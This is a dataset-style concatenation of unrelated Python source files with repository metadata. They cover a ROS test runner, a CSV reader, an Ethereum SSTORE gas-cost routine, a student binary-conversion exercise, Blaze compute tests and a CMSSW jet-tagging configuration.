| 9,800
|
py
|
Python
|
third_party/legacy_rostest/runner.py
|
mvukov/rules_ros
|
0919c94fae4c84f40c9ec23164345f6db8aef853
|
[
"Apache-2.0"
] | 14
|
2021-05-02T00:58:45.000Z
|
2022-01-11T07:01:27.000Z
|
third_party/legacy_rostest/runner.py
|
mvukov/rules_ros
|
0919c94fae4c84f40c9ec23164345f6db8aef853
|
[
"Apache-2.0"
] | null | null | null |
third_party/legacy_rostest/runner.py
|
mvukov/rules_ros
|
0919c94fae4c84f40c9ec23164345f6db8aef853
|
[
"Apache-2.0"
] | 1
|
2022-02-07T00:17:23.000Z
|
2022-02-07T00:17:23.000Z
|
# Software License Agreement (BSD License)
#
# Copyright (c) 2008, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# pylint: disable=invalid-name,consider-using-f-string,global-statement,global-variable-not-assigned,unused-argument
# pylint: disable=line-too-long
import os
import sys
import logging
import unittest
import rospkg
import rosunit.junitxml
import third_party.legacy_roslaunch as roslaunch
from third_party.legacy_rostest.rostestutil import printlog, printlogerr
from third_party.legacy_rostest.rostest_parent import ROSTestLaunchParent
# NOTE: ignoring Python style guide as unittest is sadly written with Java-like camel casing
_results = rosunit.junitxml.Result('rostest', 0, 0, 0)
def _accumulateResults(results):
_results.accumulate(results)
def getResults():
return _results
_textMode = False
def setTextMode(val):
global _textMode
_textMode = val
# global store of all ROSLaunchRunners so we can do an extra shutdown
# in the rare event a tearDown fails to execute
_test_parents = []
_config = None
def _addRostestParent(runner):
global _test_parents, _config
logging.getLogger('rostest').info("_addRostestParent [%s]", runner)
_test_parents.append(runner)
_config = runner.config
def getConfig():
return _config
def getRostestParents():
return _test_parents
# TODO: convert most of this into a run() routine of a RoslaunchRunner subclass
## generate test failure if tests with same name in launch file
def failDuplicateRunner(testName):
def fn(self):
print("Duplicate tests named [%s] in rostest suite" % testName)
self.fail("Duplicate tests named [%s] in rostest suite" % testName)
return fn
def failRunner(testName, message):
def fn(self):
print(message, file=sys.stderr)
self.fail(message)
return fn
def rostestRunner(test, results_base_dir=None):
"""
Test function generator that takes in a roslaunch Test object and
returns a class instance method that runs the test. TestCase
setUp() is responsible for ensuring that the rest of the roslaunch
state is correct and tearDown() is responsible for tearing
everything down cleanly.
@param test: rost test to run
@type test: roslaunch.Test
@return: function object to run testObj
@rtype: fn
"""
## test case pass/fail is a measure of whether or not the test ran
def fn(self):
done = False
while not done:
self.assert_(self.test_parent is not None,
"ROSTestParent initialization failed")
test_name = test.test_name
printlog("Running test [%s]", test_name)
#launch the other nodes
_, failed = self.test_parent.launch()
self.assert_(not failed,
"Test Fixture Nodes %s failed to launch" % failed)
#setup the test
test_file = os.path.join(rospkg.get_test_results_dir(),
"{}.xml".format(test_name))
# TODO: have to redeclare this due to a bug -- this file
# needs to be renamed as it aliases the module where the
# constant is elsewhere defined. The fix is to rename
# rostest.py
XML_OUTPUT_FLAG = '--gtest_output=xml:' #use gtest-compatible flag
test.args = "%s %s%s" % (test.args, XML_OUTPUT_FLAG, test_file)
if _textMode:
test.output = 'screen'
test.args = test.args + " --text"
# run the test, blocks until completion
printlog("running test %s" % test_name)
timeout_failure = False
try:
self.test_parent.run_test(test)
except roslaunch.launch.RLTestTimeoutException:
if test.retry:
timeout_failure = True
else:
raise
if not timeout_failure:
printlog("test [%s] finished" % test_name)
else:
printlogerr("test [%s] timed out" % test_name)
# load in test_file
if not _textMode or timeout_failure:
if not timeout_failure:
self.assert_(
os.path.isfile(test_file),
"test [%s] did not generate test results" % test_name)
printlog("test [%s] results are in [%s]", test_name,
test_file)
results = rosunit.junitxml.read(test_file, test_name)
test_fail = results.num_errors or results.num_failures
else:
test_fail = True
if test.retry > 0 and test_fail:
test.retry -= 1
printlog("test [%s] failed, retrying. Retries left: %s" %
(test_name, test.retry))
self.tearDown()
self.setUp()
else:
done = True
_accumulateResults(results)
printlog(
"test [%s] results summary: %s errors, %s failures, %s tests",
test_name, results.num_errors, results.num_failures,
results.num_tests)
else:
if test.retry:
printlogerr("retry is disabled in --text mode")
done = True
printlog("[ROSTEST] test [%s] done", test_name)
return fn
## Function that becomes TestCase.setup()
def setUp(self):
# new test_parent for each run. we are a bit inefficient as it would be possible to
# reuse the roslaunch base infrastructure for each test, but the roslaunch code
# is not abstracted well enough yet
self.test_parent = ROSTestLaunchParent(self.config, [self.test_file],
reuse_master=self.reuse_master,
clear=self.clear)
printlog("setup[%s] run_id[%s] starting", self.test_file,
self.test_parent.run_id)
self.test_parent.setUp()
# the config attribute makes it easy for tests to access the ROSLaunchConfig instance
self.config = self.test_parent.config
_addRostestParent(self.test_parent)
printlog("setup[%s] run_id[%s] done", self.test_file,
self.test_parent.run_id)
## Function that becomes TestCase.tearDown()
def tearDown(self):
printlog("tearDown[%s]", self.test_file)
if self.test_parent:
self.test_parent.tearDown()
printlog("rostest teardown %s complete", self.test_file)
def createUnitTest(test_file,
reuse_master=False,
clear=False,
results_base_dir=None):
"""
Unit test factory. Constructs a unittest class based on the roslaunch
@param test_file: rostest filename
@type test_file: str
"""
# parse the config to find the test files
config = roslaunch.config.load_config_default([test_file], None)
# pass in config to class as a property so that test_parent can be initialized
classdict = {
'setUp': setUp,
'tearDown': tearDown,
'config': config,
'test_parent': None,
'test_file': test_file,
'reuse_master': reuse_master,
'clear': clear
}
# add in the tests
testNames = []
for test in config.tests:
# #1989: find test first to make sure it exists and is executable
err_msg = None
node_exists = os.path.isfile(test.type) and os.access(
test.type, os.X_OK)
if not node_exists:
err_msg = "Test node {} does not exist".format(test.type)
testName = 'test%s' % (test.test_name)
if err_msg:
classdict[testName] = failRunner(test.test_name, err_msg)
elif testName in testNames:
classdict[testName] = failDuplicateRunner(test.test_name)
else:
classdict[testName] = rostestRunner(
test, results_base_dir=results_base_dir)
testNames.append(testName)
# instantiate the TestCase instance with our magically-created tests
return type('RosTest', (unittest.TestCase,), classdict)
| 33.793103
| 116
| 0.634184
|
4adfe58dd650c33518a3baf9cca110c295de15f5
| 2,280
|
py
|
Python
|
server/opendp_apps/profiler/csv_reader.py
|
mikephelan/opendp-ux
|
80c65da0ed17adc01c69b05dbc9cbf3a5973a016
|
[
"MIT"
] | 6
|
2021-05-25T18:50:58.000Z
|
2022-03-23T19:52:15.000Z
|
server/opendp_apps/profiler/csv_reader.py
|
mikephelan/opendp-ux
|
80c65da0ed17adc01c69b05dbc9cbf3a5973a016
|
[
"MIT"
] | 298
|
2021-05-19T17:34:09.000Z
|
2022-03-29T18:45:22.000Z
|
server/opendp_apps/profiler/csv_reader.py
|
opendp/dpcreator
|
6ba3c58ecdcd81ca1f4533a14ce7604eccf6a646
|
[
"MIT"
] | null | null | null |
from django.conf import settings
import csv
import pandas as pd
from opendp_apps.profiler import static_vals as pstatic
class DelimiterNotFoundException(Exception):
"""
This exception should be raised when a file does not have a clear
delimiter (empty, corrupted, etc.)
"""
pass
class ColumnLimitInvalid(Exception):
"""
The column limit may be None or an integer > 0
"""
pass
class CsvReader:
def __init__(self, filepath, column_limit=None):
"""
Utility for reading a delimited file into a dataframe,
with automatic delimiter detection
:param filepath: File to read from
:param column_limit: If passed, only return the first N columns in the dataframe
"""
self.filepath = filepath
self.delimiter = None
self.column_limit = column_limit
if self.column_limit is not None:
if not isinstance(self.column_limit, int):
raise ColumnLimitInvalid(f'{pstatic.ERR_MSG_COLUMN_LIMIT} Found: "{self.column_limit}"')
if self.column_limit < 1:
raise ColumnLimitInvalid(f'{pstatic.ERR_MSG_COLUMN_LIMIT} Found: "{self.column_limit}"')
def read(self):
"""
Build the dataframe
:return: pd.DataFrame
"""
sniffer = csv.Sniffer()
try:
with open(self.filepath, mode='r', encoding='utf-8') as infile:
dialect = sniffer.sniff(infile.readline())
self.delimiter = dialect.delimiter
df = pd.read_csv(self.filepath, delimiter=self.delimiter)
if self.column_limit:
return df[df.columns[:self.column_limit]]
return df
except pd.errors.EmptyDataError as err_obj:
user_msg = f'{pstatic.ERR_FAILED_TO_READ_DATASET} (EmptyDataError: {err_obj})'
return err_resp(user_msg)
except pd.errors.ParserError as err_obj:
user_msg = f'{pstatic.ERR_FAILED_TO_READ_DATASET} (ParserError: {err_obj})'
return err_resp(user_msg)
except UnicodeDecodeError as ex:
raise ex
except csv.Error as ex:
if self.delimiter is None:
raise DelimiterNotFoundException()
raise ex
| 34.029851
| 104
| 0.628509
|
a19be96d7df57cc36b0dfe12ba3db4b6be3acdc1
| 2,125
|
py
|
Python
|
eth/vm/forks/constantinople/storage.py
|
jmcph4/py-evm
|
0cd3ebac9c7c336b07f2f52c52b069fbe400bcef
|
[
"MIT"
] | null | null | null |
eth/vm/forks/constantinople/storage.py
|
jmcph4/py-evm
|
0cd3ebac9c7c336b07f2f52c52b069fbe400bcef
|
[
"MIT"
] | null | null | null |
eth/vm/forks/constantinople/storage.py
|
jmcph4/py-evm
|
0cd3ebac9c7c336b07f2f52c52b069fbe400bcef
|
[
"MIT"
] | null | null | null |
from eth_utils import (
encode_hex,
)
from eth.constants import (
UINT256
)
from eth.vm.computation import BaseComputation
from eth.vm.forks.constantinople import (
constants
)
def sstore_eip1283(computation: BaseComputation) -> None:
slot, value = computation.stack_pop(num_items=2, type_hint=UINT256)
current_value = computation.state.get_storage(
address=computation.msg.storage_address,
slot=slot,
)
original_value = computation.state.get_storage(
address=computation.msg.storage_address,
slot=slot,
from_journal=False
)
gas_refund = 0
if current_value == value:
gas_cost = constants.GAS_SSTORE_EIP1283_NOOP
else:
if original_value == current_value:
if original_value == 0:
gas_cost = constants.GAS_SSTORE_EIP1283_INIT
else:
gas_cost = constants.GAS_SSTORE_EIP1283_CLEAN
if value == 0:
gas_refund += constants.GAS_SSTORE_EIP1283_CLEAR_REFUND
else:
gas_cost = constants.GAS_SSTORE_EIP1283_NOOP
if original_value != 0:
if current_value == 0:
gas_refund -= constants.GAS_SSTORE_EIP1283_CLEAR_REFUND
if value == 0:
gas_refund += constants.GAS_SSTORE_EIP1283_CLEAR_REFUND
if original_value == value:
if original_value == 0:
gas_refund += constants.GAS_SSTORE_EIP1283_RESET_CLEAR_REFUND
else:
gas_refund += constants.GAS_SSTORE_EIP1283_RESET_REFUND
computation.consume_gas(
gas_cost,
reason="SSTORE: {0}[{1}] -> {2} (current: {3} / original: {4})".format(
encode_hex(computation.msg.storage_address),
slot,
value,
current_value,
original_value,
)
)
if gas_refund:
computation.refund_gas(gas_refund)
computation.state.set_storage(
address=computation.msg.storage_address,
slot=slot,
value=value,
)
| 27.960526
| 81
| 0.608941
|
ca2eb83e1f99d270e091efc168b9d130766736ea
| 1,002
|
py
|
Python
|
Esercizi01/08-RappBinary.py
|
AmadeusZhang/Corso-Python-IngMat
|
b1bf0156284e3a65e7451fc8547ceb69092b7894
|
[
"MIT"
] | null | null | null |
Esercizi01/08-RappBinary.py
|
AmadeusZhang/Corso-Python-IngMat
|
b1bf0156284e3a65e7451fc8547ceb69092b7894
|
[
"MIT"
] | null | null | null |
Esercizi01/08-RappBinary.py
|
AmadeusZhang/Corso-Python-IngMat
|
b1bf0156284e3a65e7451fc8547ceb69092b7894
|
[
"MIT"
] | null | null | null |
"""
Created on Sun Mar 20 22:24:41 2022
@author: zhzj
Dato un numero positivo Q, scrivere la sua rappresentazione in binario naturale, indicando anche il minimo numero di bit utilizzato.
Il programma dovrà esibire un comportamento come nell'esempio seguente:
Input: 19 in decimale
Output: con 5 bit = 10011 in binario.
"""
num = int( input("Inserisci un numero intero naturale in decimale: ") )
if num > 0 :
rapp = ''
# find the max index
ii = 0
while num >= 2**ii : # attenzione: min(2^ii)=1, pertanto per num=0 ci vuole una trattazione a parte
ii = ii+1
max_i = ii
ii = ii-1
while ii >= 0 :
if num >= 2**ii :
rapp = rapp + '1'
num = num - 2**ii
else :
rapp = rapp + '0'
ii = ii-1
print("con", max_i, "bit =", rapp, "in binario.")
elif num == 0 :
print('0')
else :
print("Numero non valido")
'''
To-Do: non riesce a handle with input=0 (extreme case and mayby only one)
'''
| 23.302326
| 132
| 0.592814
|
84345171ddd2de8be3bd39ec02e5c7cf618f722b
| 4,085
|
py
|
Python
|
blaze/compute/tests/test_core_compute.py
|
jreback/blaze
|
85c39335cac4ef7f2921a7f621bc13525880fc44
|
[
"BSD-3-Clause"
] | 1
|
2015-05-17T23:17:12.000Z
|
2015-05-17T23:17:12.000Z
|
blaze/compute/tests/test_core_compute.py
|
jreback/blaze
|
85c39335cac4ef7f2921a7f621bc13525880fc44
|
[
"BSD-3-Clause"
] | null | null | null |
blaze/compute/tests/test_core_compute.py
|
jreback/blaze
|
85c39335cac4ef7f2921a7f621bc13525880fc44
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import absolute_import, division, print_function
import pytest
from datashape import discover, dshape, coretypes as ct
from blaze.compute.core import (compute_up, compute, bottom_up_until_type_break,
top_then_bottom_then_top_again_etc,
swap_resources_into_scope)
from blaze.expr import by, symbol, Expr, Symbol, Reduction
from blaze.dispatch import dispatch
from blaze.compatibility import raises
from blaze.utils import example
import pandas as pd
import numpy as np
def test_errors():
t = symbol('t', 'var * {foo: int}')
with raises(NotImplementedError):
compute_up(by(t, count=t.count()), 1)
def test_optimize():
class Foo(object):
pass
s = symbol('s', '5 * {x: int, y: int}')
@dispatch(Expr, Foo)
def compute_down(expr, foo):
return str(expr)
assert compute(s.x * 2, Foo()) == "s.x * 2"
@dispatch(Expr, Foo)
def optimize(expr, foo):
return expr + 1
assert compute(s.x * 2, Foo()) == "(s.x * 2) + 1"
def test_bottom_up_until_type_break():
s = symbol('s', 'var * {name: string, amount: int}')
data = np.array([('Alice', 100), ('Bob', 200), ('Charlie', 300)],
dtype=[('name', 'S7'), ('amount', 'i4')])
e = (s.amount + 1).distinct()
expr, scope = bottom_up_until_type_break(e, {s: data})
amount = symbol('amount', 'var * real', token=1)
assert expr.isidentical(amount)
assert len(scope) == 1
assert amount in scope
assert (scope[amount] == np.array([101, 201, 301], dtype='i4')).all()
# This computation has a type change midstream, so we stop and get the
# unfinished computation.
e = s.amount.sum() + 1
expr, scope = bottom_up_until_type_break(e, {s: data})
amount_sum = symbol('amount_sum', 'int')
assert expr.isidentical(amount_sum + 1)
assert len(scope) == 1
assert amount_sum in scope
assert scope[amount_sum] == 600
# ensure that we work on binops with one child
x = symbol('x', 'real')
expr, scope = bottom_up_until_type_break(x + x, {x: 1})
assert len(scope) == 1
x2 = list(scope.keys())[0]
assert isinstance(x2, Symbol)
assert isinstance(expr, Symbol)
assert scope[x2] == 2
def test_top_then_bottom_then_top_again_etc():
s = symbol('s', 'var * {name: string, amount: int}')
data = np.array([('Alice', 100), ('Bob', 200), ('Charlie', 300)],
dtype=[('name', 'S7'), ('amount', 'i4')])
e = s.amount.sum() + 1
assert top_then_bottom_then_top_again_etc(e, {s: data}) == 601
def test_swap_resources_into_scope():
from blaze import Data
t = Data([1, 2, 3], dshape='3 * int', name='t')
expr, scope = swap_resources_into_scope(t.head(2), {t: t.data})
assert t._resources()
assert not expr._resources()
assert t not in scope
def test_compute_up_on_dict():
d = {'a': [1, 2, 3], 'b': [4, 5, 6]}
assert str(discover(d)) == str(dshape('{a: 3 * int64, b: 3 * int64}'))
s = symbol('s', discover(d))
assert compute(s.a, {s: d}) == [1, 2, 3]
def test_pre_compute_on_multiple_datasets_is_selective():
from into import CSV
from blaze import Data
from blaze.cached import CachedDataset
df = pd.DataFrame([[1, 'Alice', 100],
[2, 'Bob', -200],
[3, 'Charlie', 300],
[4, 'Denis', 400],
[5, 'Edith', -500]], columns=['id', 'name', 'amount'])
iris = CSV(example('iris.csv'))
dset = CachedDataset({'df': df, 'iris': iris})
d = Data(dset)
assert str(compute(d.df.amount)) == str(df.amount)
def test_raises_on_valid_expression_but_no_implementation():
class MyExpr(Expr):
__slots__ = '_hash', '_child'
@property
def dshape(self):
return self._child.dshape
t = symbol('t', 'var * {amount: real}')
expr = MyExpr(t.amount)
df = [(1.0,), (2.0,), (3.0,)]
with pytest.raises(NotImplementedError):
compute(expr, df)
| 29.178571
| 80
| 0.595594
|
a2bcd83597a67aca05692d36440397574609444f
| 953
|
py
|
Python
|
www/tests/test_aio.py
|
stefanhoelzl/brython
|
433d272e7bb0e3c0994392f8f265bc39e87854f7
|
[
"BSD-3-Clause"
] | 1
|
2018-10-12T12:29:14.000Z
|
2018-10-12T12:29:14.000Z
|
www/tests/test_aio.py
|
SungBeom/BBAM_Brython
|
107036ad20a94af1d43e5ce5bd7c73e6a470d687
|
[
"BSD-3-Clause"
] | null | null | null |
www/tests/test_aio.py
|
SungBeom/BBAM_Brython
|
107036ad20a94af1d43e5ce5bd7c73e6a470d687
|
[
"BSD-3-Clause"
] | null | null | null |
from browser import console
import asyncio
async def wait_secs(s, result):
await asyncio.sleep(s)
console.log("Returning result", result)
return result
@aio.async_test(0.5)
def test_simple_coroutine():
console.log("coro_wait_secs")
coro_wait_secs = wait_secs(0.1, 10)
console.log("ensuring future")
fut = asyncio.ensure_future(coro_wait_secs)
console.log("asserting")
assert asyncio.iscoroutine(coro_wait_secs), "Result of running a coroutine function should be a coroutine object"
assert asyncio.iscoroutinefunction(wait_secs), "asyncio.coroutine decorator should return a coroutine function"
assert isinstance(fut, asyncio.Future), "ensure_future should return a future"
console.log("yielding")
result = yield from fut
console.log("asserting")
assert fut.result() == result, "yield from future should return its result"
assert result == 10, "Future result different from expected"
| 34.035714
| 117
| 0.740818
|
ac2bc5a5b23efafaead655619edbc4b2ad376a01
| 1,605
|
py
|
Python
|
tuplas.py
|
franciscoRic/Aula-Python
|
bc767b2ff22526ad0c3cc4ab51ee5227be9ce399
|
[
"MIT"
] | null | null | null |
tuplas.py
|
franciscoRic/Aula-Python
|
bc767b2ff22526ad0c3cc4ab51ee5227be9ce399
|
[
"MIT"
] | null | null | null |
tuplas.py
|
franciscoRic/Aula-Python
|
bc767b2ff22526ad0c3cc4ab51ee5227be9ce399
|
[
"MIT"
] | null | null | null |
"""
# As tuplas são representadas por um ()
tupla1 = (1, 2, 3, 4, 5, 6)
print(tupla1)
print(type(tupla1))
tupla2 = 1, 2, 3, 4, 5, 6
print(tupla1)
print(type(tupla2))
# As Duplas devem ter mais de 1 valor.
#Não é tupla
tupla3 = (4)
print(tupla3)
print(type(tupla3))
tupla4 = (4,) # Isso é uma tupla
print(tupla4)
print(type(tupla4))
tupla5 = 4,
print(tupla5)
print(type(tupla5))
tupla = tuple(range(11))
print(tupla)
print(type(tupla))
#Desempacotamento de Tupla
tupla = ('Francisco Ricardo', 'Analista de sistemas')
escola, curso = tupla
print(escola)
print(curso)
# Metodos para adição e remoção de elementos nas tuplas não existem, pois são imutavei.
# Na Tupla ´podemos usar Soma, maximo, minimo e tamanho
tupla = (1, 2, 3, 4, 5)
print(sum(tupla))
print(max(tupla))
print(min(tupla))
print(len(tupla))
# Concatenação de Tuplas
tupla1 = 1, 2, 3
print(tupla1)
tupla2 = (4, 5, 6)
print(tupla2)
print(tupla1 + tupla2)
print(tupla1)
print(tupla2)
#VERIFICAR DETERMINADO ELEMENTO EM UMA TUPLA
tupla = 1, 2, 3,
print(3 in tupla)
#Iterando sobre uma tupla
tupla = 1, 2, 3, 3
for n in tupla:
print(n)
for indice, valor in enumerate(tupla):
print(indice, valor)
#Contar elementos em uma tupla
print(tupla.count(3))
escola = tuple('Francisco Ricardo')
print(escola)
print(escola.count('R'))
#Onde usar Tupla
mes = ('Janeiro', 'Fevereiro', 'Março')
semana = ('Segunda', 'Terça', 'Quarta')
mes = ('Janeiro', 'Fevereiro', 'Março', 'Abril', 'Maio', 'Junho', 'Julho')
#Iterar com While
i = 0
while i < len(mes):
print(mes[i])
i = i + 1
print(mes[2:5])
"""
| 14.078947
| 87
| 0.666044
|
dd65bcdb3c21bf9f21232b9058064bc9496e5acb
| 171
|
py
|
Python
|
scripts/quest/q29980s.py
|
G00dBye/YYMS
|
1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb
|
[
"MIT"
] | 54
|
2019-04-16T23:24:48.000Z
|
2021-12-18T11:41:50.000Z
|
scripts/quest/q29980s.py
|
G00dBye/YYMS
|
1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb
|
[
"MIT"
] | 3
|
2019-05-19T15:19:41.000Z
|
2020-04-27T16:29:16.000Z
|
scripts/quest/q29980s.py
|
G00dBye/YYMS
|
1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb
|
[
"MIT"
] | 49
|
2020-11-25T23:29:16.000Z
|
2022-03-26T16:20:24.000Z
|
# True Knight of Light
medal = 1142403
if sm.canHold(medal):
sm.chatScript("You have earned a new medal.")
sm.startQuest(parentID)
sm.completeQuest(parentID)
| 21.375
| 49
| 0.71345
|
d82a20c5ebb586b8458d48f2d594f7001c4379c7
| 444
|
py
|
Python
|
blog/migrations/0011_auto_20200703_2039.py
|
joshi008/PenIt-Personal-Blogging-Website
|
5fd3c3422909d0c2bcabdd40aeeec30dce57d009
|
[
"MIT"
] | 2
|
2020-08-02T10:54:39.000Z
|
2020-09-09T19:04:56.000Z
|
blog/migrations/0011_auto_20200703_2039.py
|
joshi008/PenIt-Personal-Blogging-Website
|
5fd3c3422909d0c2bcabdd40aeeec30dce57d009
|
[
"MIT"
] | 8
|
2021-04-08T20:58:47.000Z
|
2022-03-12T00:54:03.000Z
|
blog/migrations/0011_auto_20200703_2039.py
|
joshi008/PenIt-Personal-Blogging-Website
|
5fd3c3422909d0c2bcabdd40aeeec30dce57d009
|
[
"MIT"
] | 1
|
2021-02-27T19:11:31.000Z
|
2021-02-27T19:11:31.000Z
|
# Generated by Django 2.2 on 2020-07-03 15:09
from django.db import migrations
import django_summernote.fields
class Migration(migrations.Migration):
dependencies = [
('blog', '0010_auto_20200603_1818'),
]
operations = [
migrations.AlterField(
model_name='blogpost',
name='content',
field=django_summernote.fields.SummernoteTextField(blank=True, null=True),
),
]
| 22.2
| 86
| 0.641892
|
8bf41417f631d7fe2ae67449f71c6711218db572
| 4,332
|
py
|
Python
|
RecoBTag/ONNXRuntime/python/pfDeepBoostedDiscriminatorsJetTags_cfi.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 852
|
2015-01-11T21:03:51.000Z
|
2022-03-25T21:14:00.000Z
|
RecoBTag/ONNXRuntime/python/pfDeepBoostedDiscriminatorsJetTags_cfi.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 30,371
|
2015-01-02T00:14:40.000Z
|
2022-03-31T23:26:05.000Z
|
RecoBTag/ONNXRuntime/python/pfDeepBoostedDiscriminatorsJetTags_cfi.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 3,240
|
2015-01-02T05:53:18.000Z
|
2022-03-31T17:24:21.000Z
|
import FWCore.ParameterSet.Config as cms
pfDeepBoostedDiscriminatorsJetTags = cms.EDProducer(
'BTagProbabilityToDiscriminator',
discriminators = cms.VPSet(
cms.PSet(
name = cms.string('TvsQCD'),
numerator = cms.VInputTag(
cms.InputTag('pfDeepBoostedJetTags', 'probTbcq'),
cms.InputTag('pfDeepBoostedJetTags', 'probTbqq'),
),
denominator = cms.VInputTag(
cms.InputTag('pfDeepBoostedJetTags', 'probTbcq'),
cms.InputTag('pfDeepBoostedJetTags', 'probTbqq'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDbb'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDcc'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDb'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDc'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDothers'),
),
),
cms.PSet(
name = cms.string('WvsQCD'),
numerator = cms.VInputTag(
cms.InputTag('pfDeepBoostedJetTags', 'probWcq'),
cms.InputTag('pfDeepBoostedJetTags', 'probWqq'),
),
denominator = cms.VInputTag(
cms.InputTag('pfDeepBoostedJetTags', 'probWcq'),
cms.InputTag('pfDeepBoostedJetTags', 'probWqq'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDbb'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDcc'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDb'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDc'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDothers'),
),
),
cms.PSet(
name = cms.string('ZvsQCD'),
numerator = cms.VInputTag(
cms.InputTag('pfDeepBoostedJetTags', 'probZbb'),
cms.InputTag('pfDeepBoostedJetTags', 'probZcc'),
cms.InputTag('pfDeepBoostedJetTags', 'probZqq'),
),
denominator = cms.VInputTag(
cms.InputTag('pfDeepBoostedJetTags', 'probZbb'),
cms.InputTag('pfDeepBoostedJetTags', 'probZcc'),
cms.InputTag('pfDeepBoostedJetTags', 'probZqq'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDbb'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDcc'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDb'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDc'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDothers'),
),
),
cms.PSet(
name = cms.string('ZbbvsQCD'),
numerator = cms.VInputTag(
cms.InputTag('pfDeepBoostedJetTags', 'probZbb'),
),
denominator = cms.VInputTag(
cms.InputTag('pfDeepBoostedJetTags', 'probZbb'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDbb'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDcc'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDb'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDc'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDothers'),
),
),
cms.PSet(
name = cms.string('HbbvsQCD'),
numerator = cms.VInputTag(
cms.InputTag('pfDeepBoostedJetTags', 'probHbb'),
),
denominator = cms.VInputTag(
cms.InputTag('pfDeepBoostedJetTags', 'probHbb'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDbb'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDcc'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDb'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDc'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDothers'),
),
),
cms.PSet(
name = cms.string('H4qvsQCD'),
numerator = cms.VInputTag(
cms.InputTag('pfDeepBoostedJetTags', 'probHqqqq'),
),
denominator = cms.VInputTag(
cms.InputTag('pfDeepBoostedJetTags', 'probHqqqq'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDbb'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDcc'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDb'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDc'),
cms.InputTag('pfDeepBoostedJetTags', 'probQCDothers'),
),
),
)
)
| 43.32
| 66
| 0.586334
|
085376138ebed7bdad9d5e0f3f5b08aaa7ef3a59
| 713
|
py
|
Python
|
stinkies/portal/views.py
|
jordan-dimov/stinky-games
|
175c3fa21276456cb1b58703b835f8393f5b2b4a
|
[
"CC0-1.0"
] | null | null | null |
stinkies/portal/views.py
|
jordan-dimov/stinky-games
|
175c3fa21276456cb1b58703b835f8393f5b2b4a
|
[
"CC0-1.0"
] | null | null | null |
stinkies/portal/views.py
|
jordan-dimov/stinky-games
|
175c3fa21276456cb1b58703b835f8393f5b2b4a
|
[
"CC0-1.0"
] | null | null | null |
from django.contrib import messages
from django.shortcuts import render
from django.utils.safestring import mark_safe
from friendship.models import Friend
def homepage_view(request):
context = {
}
if request.user.is_authenticated:
friendship_requests = Friend.objects.requests(request.user)
for frq in friendship_requests:
msg = "{0} wants to be friends with you! <a href='#' id='frq_accept' onclick='accept_frq(\"{1}\");'>Accept</a> | <a id='frq_reject' href='#'>Reject</a>".format(frq.from_user, frq.id)
messages.info(request, mark_safe(msg))
context['frqs'] = friendship_requests
return render(request, "portal/homepage.html", context=context)
| 41.941176
| 194
| 0.69986
|
db9ab3a6b6c72114b91d95dac8ab8b4dc841a1f2
| 4,404
|
py
|
Python
|
zenstates.py
|
fbmoose48/ZenStates-Linux
|
9e76197fdd4b5a969b3af6c0af290f9121691c7f
